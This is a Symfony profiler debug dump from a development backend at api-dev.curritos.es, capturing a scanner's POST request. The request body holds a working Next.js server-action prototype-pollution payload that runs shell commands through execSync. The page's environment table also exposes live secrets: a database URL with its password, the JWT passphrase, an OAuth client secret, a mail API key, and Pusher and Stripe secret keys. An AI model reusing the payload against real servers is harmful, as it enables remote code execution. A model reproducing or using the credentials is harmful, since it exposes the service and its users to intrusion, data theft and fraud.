Request / Response
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| 0 | "{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 2>&1 | head -c 500 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}" |
| 1 | ""$@0"" |
| 2 | "[]" |
Uploaded Files
No files were uploaded
Request Attributes
| Key | Value |
|---|---|
| _controller | "App\Controller\Backoffice\DashboardController::index" |
| _firewall_context | "security.firewall.map.context.backoffice" |
| _redirected | true |
| _route | "backoffice_dashboard_index" |
| _route_params | [] |
| _security_firewall_run | "_security_backoffice" |
| _stopwatch_token | "34a9dd" |
| _vary_by_language | true |
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip, deflate" |
| authorization | "" |
| connection | "keep-alive" |
| content-length | "772" |
| content-type | "multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
| cookie | "sf_redirect=%7B%22token%22%3A%22af4a72%22%2C%22route%22%3A%22backoffice_dashboard_index%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CBackoffice%5C%5CDashboardController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fapi-dev.curritos.es%5C%2Fpublic_html%5C%2Fcurritos-backend%5C%2Fsrc%5C%2FController%5C%2FBackoffice%5C%2FDashboardController.php%22%2C%22line%22%3A32%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D" |
| host | "api-dev.curritos.es" |
| next-action | "x" |
| user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" |
| x-nextjs-html-request-id | "SSTMXm7OJ_g0Ncx6jpQt9" |
| x-nextjs-request-id | "b5dce965" |
| x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=utf-8" |
| date | "Tue, 17 Feb 2026 09:58:43 GMT" |
| location | "https://api-dev.curritos.es/login-admin" |
| vary | "Accept-Language" |
| x-debug-token | "c12157" |
Cookies
Request Cookies
| Key | Value |
|---|---|
| sf_redirect | "{"token":"af4a72","route":"backoffice_dashboard_index","method":"POST","controller":{"class":"App\\Controller\\Backoffice\\DashboardController","method":"index","file":"\/var\/www\/api-dev.curritos.es\/public_html\/curritos-backend\/src\/Controller\/Backoffice\/DashboardController.php","line":32},"status_code":302,"status_text":"Found"}" |
Response Cookies
No response cookies
Session 1
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
1
Usages
Stateless check enabled
| Usage |
|---|
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:41
[
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
"line" => 41
"function" => "getMetadataBag"
"class" => "Symfony\Component\HttpFoundation\Session\Session"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-http/Firewall/AccessListener.php"
"line" => 78
"function" => "getToken"
"class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
"line" => 46
"function" => "authenticate"
"class" => "Symfony\Component\Security\Http\Firewall\AccessListener"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-http/Firewall/AbstractListener.php"
"line" => 26
"function" => "authenticate"
"class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
"line" => 60
"function" => "__invoke"
"class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
"line" => 77
"function" => "__invoke"
"class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/security-http/Firewall.php"
"line" => 95
"function" => "callListeners"
"class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
"line" => 115
"function" => "onKernelRequest"
"class" => "Symfony\Component\Security\Http\Firewall"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/event-dispatcher/EventDispatcher.php"
"line" => 206
"function" => "__invoke"
"class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/event-dispatcher/EventDispatcher.php"
"line" => 56
"function" => "callListeners"
"class" => "Symfony\Component\EventDispatcher\EventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
"line" => 122
"function" => "dispatch"
"class" => "Symfony\Component\EventDispatcher\EventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/http-kernel/HttpKernel.php"
"line" => 159
"function" => "dispatch"
"class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/http-kernel/HttpKernel.php"
"line" => 76
"function" => "handleRaw"
"class" => "Symfony\Component\HttpKernel\HttpKernel"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/http-kernel/Kernel.php"
"line" => 182
"function" => "handle"
"class" => "Symfony\Component\HttpKernel\HttpKernel"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
"line" => 35
"function" => "handle"
"class" => "Symfony\Component\HttpKernel\Kernel"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/autoload_runtime.php"
"line" => 29
"function" => "run"
"class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
"type" => "->"
]
[
"file" => "/var/www/api-dev.curritos.es/public_html/curritos-backend/public/index.php"
"line" => 5
"args" => [
"/var/www/api-dev.curritos.es/public_html/curritos-backend/vendor/autoload_runtime.php"
]
"function" => "require_once"
]
]
|
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| APP_ENV | "dev" |
| APP_HOST | "" |
| APP_SCHEME | "" |
| APP_SECRET | "f7c9a1e5b40236d8a31e95f41a8b5fdf" |
| BASE_URL | "https://api-dev.curritos.es" |
| CORS_ALLOW_ORIGIN | "^https?://.*$" |
| DATABASE_URL | "postgresql://curritos_dev:AVNS_L718OYict_wJmyySVFk@db-postgresql-fra1-32287-do-user-19854112-0.i.db.ondigitalocean.com:25060/curritos_dev?serverVersion=16&charset=utf8" |
| FIREBASE_PROJECT_ID | "curritos-app" |
| FIREBASE_SERVICE_ACCOUNT | "config/curritos-fa3af-65731679307e.json" |
| GCP_CREDENTIALS_FILE | "" |
| GOOGLE_STORAGE_BUCKET | "" |
| JWT_PASSPHRASE | "7b4d83a2f6c0de911e52a1790bb63a94748e5f5a3cecd20b3f72abdc902e1d3f" |
| JWT_PUBLIC_KEY | "%kernel.project_dir%/config/jwt/public.pem" |
| JWT_SECRET_KEY | "%kernel.project_dir%/config/jwt/private.pem" |
| MAILER_DSN | "smtp://resend:re_RgQ1bEK4_148xAFA1VUyYJKsB2wxBJyyR@smtp.resend.com:2587?encryption=tls" |
| MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
| OAUTH_GOOGLE_CLIENT_ID | "856972770685-juspa8rsndo31kg44hphhfdosa46i2m2.apps.googleusercontent.com" |
| OAUTH_GOOGLE_CLIENT_SECRET | "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" |
| PASSWORD_RESET_TOKEN_TTL | "+24 hours" |
| PUSHER_APP_ID | "1982677" |
| PUSHER_CLUSTER | "eu" |
| PUSHER_KEY | "530abccccfb42d22cfad" |
| PUSHER_SECRET | "ebd34fc01ddae139988a" |
| STRIPE_CHECKOUT_SESSION_PAYMENT_CANCEL_URL | "https://app-development.curritos.es/payment-fail" |
| STRIPE_CHECKOUT_SESSION_PAYMENT_SUCCESS_URL | "https://app-development.curritos.es/payment-success" |
| STRIPE_CHECKOUT_SESSION_SUBSCRIPTION_CANCEL_URL | "https://app-development.curritos.es/app/profile/subscriptions" |
| STRIPE_CHECKOUT_SESSION_SUBSCRIPTION_SUCCESS_URL | "https://app-development.curritos.es/app/profile/subscriptions" |
| STRIPE_CONNECTED_ACCOUNT_REFRESH_URL | "https://app-development.curritos.es/app/financial/history" |
| STRIPE_CONNECTED_ACCOUNT_RETURN_URL | "https://app-development.curritos.es/app/financial/history" |
| STRIPE_PLATFORM_RECIPIENT_SHARE | "10" |
| STRIPE_PUBLIC_KEY | "pk_test_51ROjxJCG9jGlUrCwPLQnd7oOjxp2qWDDU6SWHcfQ05mzuYi1IHDni11fZcNdjwmJvcm8KuW1m85dDssIcTNNjiDM004aqJtvIm" |
| STRIPE_SECRET_KEY | "sk_test_51ROjxJCG9jGlUrCwrndsXvQbhiymbDtjfLSNN0GCBxLhq67vNAMOQ89Q7c0I58MTpOJDYJ4SoVGnhwTM2x1U2dCB00NmWgzdGK" |
| STRIPE_WEBHOOK_SECRET_KEY | "we_1RQVbSCG9jGlUrCwv9tEzVEP" |
| UPLOADS_BASE_URL | "https://api-dev.curritos.es" |
| UPLOADS_FOLDER_NAME | "uploads" |
| WKHTMLTOIMAGE_PATH | "" |
| WKHTMLTOPDF_PATH | "" |
Defined as regular env variables
| Key | Value |
|---|---|
| CONTENT_LENGTH | "772" |
| CONTENT_TYPE | "multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/api-dev.curritos.es/public_html/curritos-backend/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/api-dev.curritos.es/public_html/curritos-backend/public" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip, deflate" |
| HTTP_AUTHORIZATION | "" |
| HTTP_CONNECTION | "keep-alive" |
| HTTP_COOKIE | "sf_redirect=%7B%22token%22%3A%22af4a72%22%2C%22route%22%3A%22backoffice_dashboard_index%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CBackoffice%5C%5CDashboardController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fapi-dev.curritos.es%5C%2Fpublic_html%5C%2Fcurritos-backend%5C%2Fsrc%5C%2FController%5C%2FBackoffice%5C%2FDashboardController.php%22%2C%22line%22%3A32%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D" |
| HTTP_HOST | "api-dev.curritos.es" |
| HTTP_NEXT_ACTION | "x" |
| HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" |
| HTTP_X_NEXTJS_HTML_REQUEST_ID | "SSTMXm7OJ_g0Ncx6jpQt9" |
| HTTP_X_NEXTJS_REQUEST_ID | "b5dce965" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "69.5.23.23" |
| REMOTE_PORT | "36976" |
| REQUEST_METHOD | "POST" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1771322323 |
| REQUEST_TIME_FLOAT | 1771322323.373 |
| REQUEST_URI | "/admin" |
| SCRIPT_FILENAME | "/var/www/api-dev.curritos.es/public_html/curritos-backend/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "134.122.69.194" |
| SERVER_ADMIN | "admin@curritos.es" |
| SERVER_NAME | "api-dev.curritos.es" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache" |
| SSL_TLS_SNI | "api-dev.curritos.es" |
| SYMFONY_DOTENV_PATH | "/var/www/api-dev.curritos.es/public_html/curritos-backend/.env" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,MESSENGER_TRANSPORT_DSN,JWT_SECRET_KEY,JWT_PUBLIC_KEY,PASSWORD_RESET_TOKEN_TTL,APP_SCHEME,APP_HOST,UPLOADS_FOLDER_NAME,UPLOADS_BASE_URL,OAUTH_GOOGLE_CLIENT_ID,OAUTH_GOOGLE_CLIENT_SECRET,GCP_CREDENTIALS_FILE,PUSHER_APP_ID,PUSHER_KEY,PUSHER_SECRET,PUSHER_CLUSTER,CORS_ALLOW_ORIGIN,WKHTMLTOPDF_PATH,WKHTMLTOIMAGE_PATH,APP_DEBUG,MAILER_DSN,JWT_PASSPHRASE,BASE_URL,STRIPE_PUBLIC_KEY,STRIPE_SECRET_KEY,STRIPE_WEBHOOK_SECRET_KEY,STRIPE_PLATFORM_RECIPIENT_SHARE,STRIPE_CHECKOUT_SESSION_PAYMENT_SUCCESS_URL,STRIPE_CHECKOUT_SESSION_PAYMENT_CANCEL_URL,STRIPE_CHECKOUT_SESSION_SUBSCRIPTION_SUCCESS_URL,STRIPE_CHECKOUT_SESSION_SUBSCRIPTION_CANCEL_URL,STRIPE_CONNECTED_ACCOUNT_RETURN_URL,STRIPE_CONNECTED_ACCOUNT_REFRESH_URL,FIREBASE_PROJECT_ID,FIREBASE_SERVICE_ACCOUNT,GOOGLE_STORAGE_BUCKET" |
| UNIQUE_ID | "aZQ70wQ_LOZKnf5P8amr2wAAAAY" |